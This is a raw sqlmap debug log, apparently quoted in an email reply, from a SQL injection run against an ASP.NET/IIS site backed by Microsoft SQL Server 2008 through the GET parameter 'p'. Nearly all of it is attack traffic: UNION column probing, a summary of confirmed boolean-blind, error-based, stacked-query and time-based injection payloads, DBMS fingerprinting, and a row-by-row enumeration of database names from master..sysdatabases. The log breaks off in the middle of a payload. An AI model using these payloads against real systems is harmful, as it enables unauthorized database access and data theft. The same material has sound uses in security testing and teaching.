[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, > NULL, > > NULL, NULL, NULL-- AND 'ZBcW'='ZBcW > > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, > NULL, > > NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM > > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, > NULL, > > NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn > > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:38] [INFO] target url appears to be UNION injectable with 3 > columns > > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, > > > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) > > AS NVARCHAR(4000)), > > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND > > 'VYhx'='VYhx > > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, > > > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) > > AS NVARCHAR(4000)), > > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND > 'TyzA'='TyzA > > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT > > > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) > > AS NVARCHAR(4000)), > > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- > AND > > 'bKpM'='bKpM > > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL, > > > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) > > AS NVARCHAR(4000)), > > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND > 'HwBz'='HwBz > > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT > > > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) > > AS NVARCHAR(4000)), > > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- > AND > > 'hiSw'='hiSw > > [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, > > > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) > > AS NVARCHAR(4000)), > > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND > > 'FIBp'='FIBp > > [09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 > > columns' because the level is higher than the provided > > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 > > columns' because the level is higher than the provided > > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 > > columns' because the level is higher than the provided > > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 > > columns' because the level is higher than the provided > > [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep > > testing the others? [y/N] N > > [09:55:43] [DEBUG] used the default behaviour, running in batch mode > > sqlmap identified the following injection points with a total of 30 > HTTP(s) > > requests: > > --- > > Place: GET > > Parameter: p > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa > > > > Type: error-based > > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > > clause > > Payload: p=20111' AND > > 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl > > > > Type: stacked queries > > Title: Microsoft SQL Server/Sybase stacked queries > > Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > > > > Type: AND/OR time-based blind > > Title: Microsoft SQL Server/Sybase time-based blind > > Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > > --- > > > > [09:55:43] [INFO] testing Microsoft SQL Server > > [09:55:43] [PAYLOAD] 20111' AND > > 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE > > CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND > > 'XHDB'='XHDB > > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:44] [INFO] retrieved: 1 > > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > > [09:55:44] [INFO] confirming Microsoft SQL Server > > [09:55:44] [PAYLOAD] 20111' AND > > 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH > > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:44] [INFO] retrieved: 1 > > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > > [09:55:44] [PAYLOAD] 20111' AND > > 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM > > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:44] [INFO] retrieved: 1 > > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > > [09:55:44] [PAYLOAD] 20111' AND > > 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT > > [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:45] [INFO] retrieved: 1 > > [09:55:45] [DEBUG] performed 1 queries in 0 seconds > > [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server > > web server operating system: Windows Vista > > web application technology: ASP.NET, Microsoft IIS 7.0 > > back-end DBMS: Microsoft SQL Server 2008 > > [09:55:45] [INFO] fetching database names > > [09:55:45] [PAYLOAD] 20111' AND > > 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND > > 'IIWR'='IIWR > > [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:45] [INFO] the SQL query used returns 37 entries > > [09:55:45] [PAYLOAD] 20111' AND > > 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh > > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:46] [PAYLOAD] 20111' AND > > 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn > > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:46] [PAYLOAD] 20111' AND > > 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn > > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:47] [PAYLOAD] 20111' AND > > 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl > > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:47] [PAYLOAD] 20111' AND > > 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC > > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:48] [PAYLOAD] 20111' AND > > 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT > > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:48] [PAYLOAD] 20111' AND > > 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW > > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:48] [PAYLOAD] 20111' AND > > 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG > > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:49] [PAYLOAD] 20111' AND > > 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN > > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:50] [PAYLOAD] 20111' AND > > 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv > > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:50] [PAYLOAD] 20111' AND > > 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn > > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:50] [PAYLOAD] 20111' AND > > 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo > > [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:51] [PAYLOAD] 20111' AND > > 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD > > [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:52] [PAYLOAD] 20111' AND > > 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc > > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:53] [PAYLOAD] 20111' AND > > 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ > > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:53] [PAYLOAD] 20111' AND > > 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb > > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:53] [PAYLOAD] 20111' AND > > 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt > > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:54] [PAYLOAD] 20111' AND > > 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI > > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:54] [PAYLOAD] 20111' AND > > 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ > > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:54] [PAYLOAD] 20111' AND > > 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe > > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:55] [PAYLOAD] 20111' AND > > 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT > > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:55] [PAYLOAD] 20111' AND > > 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP > > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:55] [PAYLOAD] 20111' AND > > 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB > > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:56] [PAYLOAD] 20111' AND > > 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP > > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases > > WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY > 1 > > ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > > AND 'COwJ'='COwJ > > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:56] [PAYLOAD] 20111' AND > > 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk > > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP > > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases > > WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY > 1 > > ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > > AND 'STKX'='STKX > > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp > > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf > > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:57] [PAYLOAD] 20111' AND > > 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx > > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:58] [PAYLOAD] 20111' AND > > 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd > > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:55:58] [PAYLOAD] 20111' AND > > 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT > > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:00] [PAYLOAD] 20111' AND > > 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk > > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:00] [PAYLOAD] 20111' AND > > 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > > master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM > > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER > > [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:01] [PAYLOAD] 20111' AND > > 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP > > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases > > WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases 